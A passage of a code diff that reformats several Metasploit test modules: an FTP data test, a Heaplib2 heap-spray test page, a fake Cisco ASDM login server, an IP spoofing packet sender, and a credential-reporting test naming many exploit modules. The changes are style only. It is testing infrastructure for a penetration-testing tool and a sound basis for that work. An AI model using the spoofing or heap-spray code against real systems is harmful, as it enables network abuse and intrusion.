|
],
|
||||||
],
|
'DefaultAction' => 'Spoofer'
|
||||||
'DefaultAction' => 'Spoofer'
|
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -3,29 +3,26 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Ftp
|
include Msf::Exploit::Remote::Ftp
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
|
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
|
||||||
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
|
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
|
||||||
'Author' => [ 'Thomas Ring', 'jduck' ],
|
'Author' => [ 'Thomas Ring', 'jduck' ],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
|
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
|
||||||
]
|
]
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
||||||
begin
|
begin
|
||||||
if (not connect_login)
|
if (not connect_login)
|
||||||
return
|
return
|
||||||
|
@ -34,24 +31,24 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
curdir = ""
|
curdir = ""
|
||||||
|
|
||||||
# change to the upload directory
|
# change to the upload directory
|
||||||
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
|
result = send_cmd(["CWD", datastore['UPLOADDIR']], true)
|
||||||
print_status("CWD response: #{result.inspect}")
|
print_status("CWD response: #{result.inspect}")
|
||||||
|
|
||||||
# find out what the server thinks this dir is
|
# find out what the server thinks this dir is
|
||||||
result = send_cmd( ["PWD"], true )
|
result = send_cmd(["PWD"], true)
|
||||||
print_status("PWD response: #{result.inspect}")
|
print_status("PWD response: #{result.inspect}")
|
||||||
if (result =~ /257\s\"(.+)\"/)
|
if (result =~ /257\s\"(.+)\"/)
|
||||||
curdir = $1
|
curdir = $1
|
||||||
end
|
end
|
||||||
curdir = "/" + curdir if curdir[0] != "/"
|
curdir = "/" + curdir if curdir[0] != "/"
|
||||||
curdir << "/" if curdir[-1,1] != "/"
|
curdir << "/" if curdir[-1, 1] != "/"
|
||||||
|
|
||||||
# generate some data to upload
|
# generate some data to upload
|
||||||
data = Rex::Text.rand_text_alphanumeric(1024)
|
data = Rex::Text.rand_text_alphanumeric(1024)
|
||||||
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
|
# print_status("data:\n" + Rex::Text.to_hex_dump(data))
|
||||||
|
|
||||||
# test putting data
|
# test putting data
|
||||||
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
|
result = send_cmd_data(["PUT", curdir + "test"], data, "I")
|
||||||
print_status("PUT response: #{result.inspect}")
|
print_status("PUT response: #{result.inspect}")
|
||||||
|
|
||||||
# test fallthrough
|
# test fallthrough
|
||||||
|
@ -63,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
print_status("LS response: #{result.inspect}")
|
print_status("LS response: #{result.inspect}")
|
||||||
|
|
||||||
# test getting file
|
# test getting file
|
||||||
result = send_cmd_data(["GET", curdir+"test"], "A")
|
result = send_cmd_data(["GET", curdir + "test"], "A")
|
||||||
print_status("GET response: #{result[0].inspect}")
|
print_status("GET response: #{result[0].inspect}")
|
||||||
|
|
||||||
# see if it matches
|
# see if it matches
|
||||||
|
@ -74,13 +71,11 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
# adios
|
# adios
|
||||||
result = send_cmd( ["QUIT"], true )
|
result = send_cmd(["QUIT"], true)
|
||||||
print_status("QUIT response: #{result.inspect}")
|
print_status("QUIT response: #{result.inspect}")
|
||||||
|
|
||||||
ensure
|
ensure
|
||||||
disconnect
|
disconnect
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,35 +3,35 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Heaplib2 Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field.
|
'Name' => "Heaplib2 Test",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field.
|
||||||
'Author' => [ 'sinn3r' ],
|
},
|
||||||
'References' =>
|
'License' => MSF_LICENSE,
|
||||||
[
|
'Author' => [ 'sinn3r' ],
|
||||||
|
'References' => [
|
||||||
[ 'URL', 'https://metasploit.com' ]
|
[ 'URL', 'https://metasploit.com' ]
|
||||||
],
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
[ 'Automatic', {} ]
|
[ 'Automatic', {} ]
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => '2014-03-01',
|
'DisclosureDate' => '2014-03-01',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
spray = %Q|
|
spray = %Q|
|
||||||
function log(msg) {
|
function log(msg) {
|
||||||
|
@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
|
|
||||||
|
|
||||||
print_status("Sending html")
|
print_status("Sending html")
|
||||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
|
@ -3,46 +3,46 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer
|
include Msf::Exploit::Remote::HttpServer
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Basic HttpServer Simulator',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This is example of a basic HttpServer simulator, good for PR scenarios when a module
|
'Name' => 'Basic HttpServer Simulator',
|
||||||
is made, but the author no longer has access to the test box, no pcap or screenshot -
|
'Description' => %q{
|
||||||
Basically no way to prove the functionality.
|
This is example of a basic HttpServer simulator, good for PR scenarios when a module
|
||||||
|
is made, but the author no longer has access to the test box, no pcap or screenshot -
|
||||||
|
Basically no way to prove the functionality.
|
||||||
|
|
||||||
This particular simulator will pretend to act like a Cisco ASA ASDM, so the
|
This particular simulator will pretend to act like a Cisco ASA ASDM, so the
|
||||||
cisco_asa_asdm.rb module can do a live test against it.
|
cisco_asa_asdm.rb module can do a live test against it.
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
|
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' => {
|
||||||
{
|
|
||||||
'SRVPORT' => 443,
|
'SRVPORT' => 443,
|
||||||
'SSL' => true,
|
'SSL' => true,
|
||||||
'URIPATH' => '/'
|
'URIPATH' => '/'
|
||||||
},
|
},
|
||||||
'Author' => [ 'sinn3r' ],
|
'Author' => [ 'sinn3r' ],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
|
OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
|
||||||
OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
|
OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
|
|
||||||
deregister_options('RHOST')
|
deregister_options('RHOST')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns a response when the client is trying to check the connection
|
# Returns a response when the client is trying to check the connection
|
||||||
#
|
#
|
||||||
|
@ -50,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
send_response(cli, '')
|
send_response(cli, '')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns a response when the client is trying to authenticate
|
# Returns a response when the client is trying to authenticate
|
||||||
#
|
#
|
||||||
|
@ -59,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
when 'GET'
|
when 'GET'
|
||||||
# This must be the is_app_asdm? method asking
|
# This must be the is_app_asdm? method asking
|
||||||
print_status("Responding to the is_app_asdm? method")
|
print_status("Responding to the is_app_asdm? method")
|
||||||
send_response(cli, '', {'Set-Cookie'=>'webvpn'})
|
send_response(cli, '', { 'Set-Cookie' => 'webvpn' })
|
||||||
|
|
||||||
when 'POST'
|
when 'POST'
|
||||||
# This must be the do_login method. But before it can login, it must meet
|
# This must be the do_login method. But before it can login, it must meet
|
||||||
|
@ -97,22 +96,20 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def on_request_uri(cli, req)
|
def on_request_uri(cli, req)
|
||||||
print_status("Received request: #{req.uri}")
|
print_status("Received request: #{req.uri}")
|
||||||
|
|
||||||
case req.uri
|
case req.uri
|
||||||
when '/'
|
when '/'
|
||||||
res_check_conn(cli, req)
|
res_check_conn(cli, req)
|
||||||
when /\+webvpn\+\/index\.html/
|
when /\+webvpn\+\/index\.html/
|
||||||
res_login(cli, req)
|
res_login(cli, req)
|
||||||
end
|
end
|
||||||
|
|
||||||
# Request not processed, send a 404
|
# Request not processed, send a 404
|
||||||
send_not_found(cli)
|
send_not_found(cli)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def run
|
def run
|
||||||
exploit
|
exploit
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Capture
|
include Msf::Exploit::Capture
|
||||||
|
@ -12,10 +10,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple IP Spoofing Tester',
|
'Name' => 'Simple IP Spoofing Tester',
|
||||||
'Description' => 'Simple IP Spoofing Tester',
|
'Description' => 'Simple IP Spoofing Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
begin
|
begin
|
||||||
|
@ -25,8 +23,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
@@havepcap = false
|
@@havepcap = false
|
||||||
end
|
end
|
||||||
|
|
||||||
deregister_options('FILTER','PCAPFILE')
|
deregister_options('FILTER', 'PCAPFILE')
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
@ -37,9 +34,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
p.ip_ttl = 255
|
p.ip_ttl = 255
|
||||||
p.udp_sport = 53
|
p.udp_sport = 53
|
||||||
p.udp_dport = 53
|
p.udp_dport = 53
|
||||||
p.payload = "HELLO WORLD"
|
p.payload = "HELLO WORLD"
|
||||||
p.recalc
|
p.recalc
|
||||||
ret = send(ip,p)
|
ret = send(ip, p)
|
||||||
if ret == :done
|
if ret == :done
|
||||||
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
|
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
|
||||||
else
|
else
|
||||||
|
@ -48,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
close_pcap
|
close_pcap
|
||||||
end
|
end
|
||||||
|
|
||||||
def send(ip,pkt)
|
def send(ip, pkt)
|
||||||
begin
|
begin
|
||||||
capture_sendto(pkt, ip)
|
capture_sendto(pkt, ip)
|
||||||
rescue RuntimeError => e
|
rescue RuntimeError => e
|
||||||
|
@ -57,5 +54,4 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
return :done
|
return :done
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
@ -12,26 +10,24 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Recon Module Tester',
|
'Name' => 'Simple Recon Module Tester',
|
||||||
'Description' => 'Simple Recon Module Tester',
|
'Description' => 'Simple Recon Module Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' => [
|
||||||
[
|
['Continuous Port Sweep']
|
||||||
['Continuous Port Sweep']
|
],
|
||||||
],
|
'PassiveActions' => [
|
||||||
'PassiveActions' =>
|
'Continuous Port Sweep'
|
||||||
[
|
]
|
||||||
'Continuous Port Sweep'
|
|
||||||
]
|
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RHOST,
|
Opt::RHOST,
|
||||||
Opt::RPORT,
|
Opt::RPORT,
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
@ -54,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
disconnect
|
disconnect
|
||||||
report_host(:host => datastore['RHOST'])
|
report_host(:host => datastore['RHOST'])
|
||||||
report_service(
|
report_service(
|
||||||
:host => datastore['RHOST'],
|
:host => datastore['RHOST'],
|
||||||
:port => datastore['RPORT'],
|
:port => datastore['RPORT'],
|
||||||
:proto => 'tcp'
|
:proto => 'tcp'
|
||||||
)
|
)
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
|
|
|
@ -3,24 +3,26 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
FAKE_IP = '192.168.12.123'
|
FAKE_IP = '192.168.12.123'
|
||||||
FAKE_PORT = 80
|
FAKE_PORT = 80
|
||||||
FAKE_USER = 'user'
|
FAKE_USER = 'user'
|
||||||
FAKE_PASS = 'password'
|
FAKE_PASS = 'password'
|
||||||
FAKE_PROOF = 'proof'
|
FAKE_PROOF = 'proof'
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "report_cred Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module will test every auxiliary module's report_cred method
|
'Name' => "report_cred Test",
|
||||||
},
|
'Description' => %q{
|
||||||
'Author' => [ 'sinn3r' ],
|
This module will test every auxiliary module's report_cred method
|
||||||
'License' => MSF_LICENSE
|
},
|
||||||
))
|
'Author' => [ 'sinn3r' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_novell_mdm_creds
|
def test_novell_mdm_creds
|
||||||
|
@ -135,7 +137,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_dlink_dsl320b_password_extractor
|
def test_dlink_dsl320b_password_extractor
|
||||||
mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
|
mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_nexpose_xxe_file_read
|
def test_nexpose_xxe_file_read
|
||||||
|
@ -165,7 +167,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_vnc
|
def test_vnc
|
||||||
mod = framework.auxiliary.create('server/capture/vnc')
|
mod = framework.auxiliary.create('server/capture/vnc')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_smtp
|
def test_smtp
|
||||||
|
@ -175,12 +177,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_sip
|
def test_sip
|
||||||
mod = framework.auxiliary.create('server/capture/sip')
|
mod = framework.auxiliary.create('server/capture/sip')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user:FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_oracle_login
|
def test_oracle_login
|
||||||
mod = framework.auxiliary.create('admin/oracle/oracle_login')
|
mod = framework.auxiliary.create('admin/oracle/oracle_login')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_postgresql
|
def test_postgresql
|
||||||
|
@ -190,12 +192,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_pop3
|
def test_pop3
|
||||||
mod = framework.auxiliary.create('server/capture/pop3')
|
mod = framework.auxiliary.create('server/capture/pop3')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_http_basic
|
def test_http_basic
|
||||||
mod = framework.auxiliary.create('server/capture/http_basic')
|
mod = framework.auxiliary.create('server/capture/http_basic')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_ftp
|
def test_ftp
|
||||||
|
@ -245,7 +247,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_msf_rpc_login
|
def test_msf_rpc_login
|
||||||
mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
|
mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_mongodb_login
|
def test_mongodb_login
|
||||||
|
@ -285,7 +287,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_sevone_enum
|
def test_sevone_enum
|
||||||
mod = framework.auxiliary.create('scanner/http/sevone_enum')
|
mod = framework.auxiliary.create('scanner/http/sevone_enum')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '')
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '')
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_sentry_cdu_enum
|
def test_sentry_cdu_enum
|
||||||
|
@ -305,7 +307,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_rfcode_reader_enum
|
def test_rfcode_reader_enum
|
||||||
mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
|
mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password:FAKE_PASS, proof: FAKE_PROOF)
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_radware_appdictor_enum
|
def test_radware_appdictor_enum
|
||||||
|
@ -376,7 +378,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_vbulletin_vote_sqli_exec
|
def test_vbulletin_vote_sqli_exec
|
||||||
mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec')
|
mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_sap_mgmt_con_brute_login
|
def test_sap_mgmt_con_brute_login
|
||||||
|
@ -450,8 +452,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_d20pass
|
def test_d20pass
|
||||||
mod = framework.auxiliary.create('gather/d20pass')
|
mod = framework.auxiliary.create('gather/d20pass')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_doliwamp_traversal_creds
|
def test_doliwamp_traversal_creds
|
||||||
|
@ -480,11 +482,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
counter_all = 0
|
counter_all = 0
|
||||||
counter_good = 0
|
counter_good = 0
|
||||||
counter_bad = 0
|
counter_bad = 0
|
||||||
self.methods.each do |m|
|
self.methods.each do |m|
|
||||||
next if m.to_s !~ /^test_.+/
|
next if m.to_s !~ /^test_.+/
|
||||||
|
|
||||||
print_status("Trying: ##{m.to_s}")
|
print_status("Trying: ##{m.to_s}")
|
||||||
begin
|
begin
|
||||||
self.send(m)
|
self.send(m)
|
||||||
|
@ -492,7 +495,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
counter_good += 1
|
counter_good += 1
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
print_error("That blew up :-(")
|
print_error("That blew up :-(")
|
||||||
print_line("#{e.class} #{e.message}\n#{e.backtrace*"\n"}")
|
print_line("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||||
counter_bad += 1
|
counter_bad += 1
|
||||||
ensure
|
ensure
|
||||||
print_line
|
print_line
|
||||||
|
|
|
@ -3,25 +3,23 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Scanner
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Recon Module Tester',
|
'Name' => 'Simple Recon Module Tester',
|
||||||
'Description' => 'Simple Recon Module Tester',
|
'Description' => 'Simple Recon Module Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT,
|
Opt::RPORT,
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_batch_size
|
def run_batch_size
|
||||||
|
|
|
@ -3,25 +3,23 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Scanner
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Recon Module Tester',
|
'Name' => 'Simple Recon Module Tester',
|
||||||
'Description' => 'Simple Recon Module Tester',
|
'Description' => 'Simple Recon Module Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT,
|
Opt::RPORT,
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
|
@ -3,33 +3,34 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Check Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module ensures that 'check' actually functions for Auxiilary modules.
|
'Name' => "Check Test",
|
||||||
},
|
'Description' => %q{
|
||||||
'References' =>
|
This module ensures that 'check' actually functions for Auxiilary modules.
|
||||||
[
|
},
|
||||||
|
'References' => [
|
||||||
[ 'OSVDB', '0' ]
|
[ 'OSVDB', '0' ]
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
|
||||||
'todb'
|
'todb'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80)
|
Opt::RPORT(80)
|
||||||
